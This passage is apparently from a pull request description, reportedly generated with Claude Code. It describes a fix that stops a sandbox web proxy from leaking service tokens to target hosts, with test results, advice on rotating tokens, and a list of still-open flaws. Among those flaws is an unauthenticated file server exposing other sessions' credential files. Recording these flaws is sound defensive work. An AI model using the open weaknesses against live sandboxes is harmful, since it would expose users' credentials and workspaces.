**Loopback is not blocked wholesale.** Browsing a dev server the agent started is what this proxy is *for*, and blanket-blocking loopback was the cheap fix that would have broken the internal browser. Only the daemon and opencode ports are refused.

## Testing

The tests drive the real router against a real local upstream and assert on what that upstream **received**. That matters: a source-shaped assertion would pass just as happily with the strip set wired to the wrong call — exactly the mistake #6094 had to correct. Reverting the strip fails two of them:

```
(fail) /web-proxy does not forward our credentials to the target > the upstream receives none of them
(fail) /web-proxy does not forward our credentials to the target > the service key does not appear anywhere in the upstream request
 6 pass, 2 fail
```

One test asserts the agent's own dev server still proxies, so the guard can't later be widened into a feature regression unnoticed.

**Gates:** `bun run typecheck` clean; `bun test src` → **342 pass / 0 fail**; `BUN_COMPILE_TARGET=bun-linux-x64 bun run build` produces the binary.

## Note on rotation

This does not un-leak anything already sent. If any sandbox's `/web-proxy` was pointed at an external host, that host received a live `KORTIX_TOKEN` for that box. Sandbox service keys are per-sandbox and boxes are short-lived, which bounds it, but it is worth deciding whether to force-rotate rather than wait for natural turnover.

## Still open from the same sweep

Not in this PR, each needs its own fix: port **3211** (static-web) serves any file under `/workspace,/home,/tmp,/opt` with no auth of its own and is not classed as session data, so account membership alone reads another session's workspace and its `kortix-opencode.json` / `auth.json` credentials; `/kortix/git/commit-push` is bearer-only (the #6094 class exactly) and writes to the customer's git remote; and `callerSessionId` is never set for a `kortix_sb_` token, so the KaaB per-end-user narrowing on the session-data ports never fires.

🤖 Generated with [Claude Code](https://claude.com/claude-code)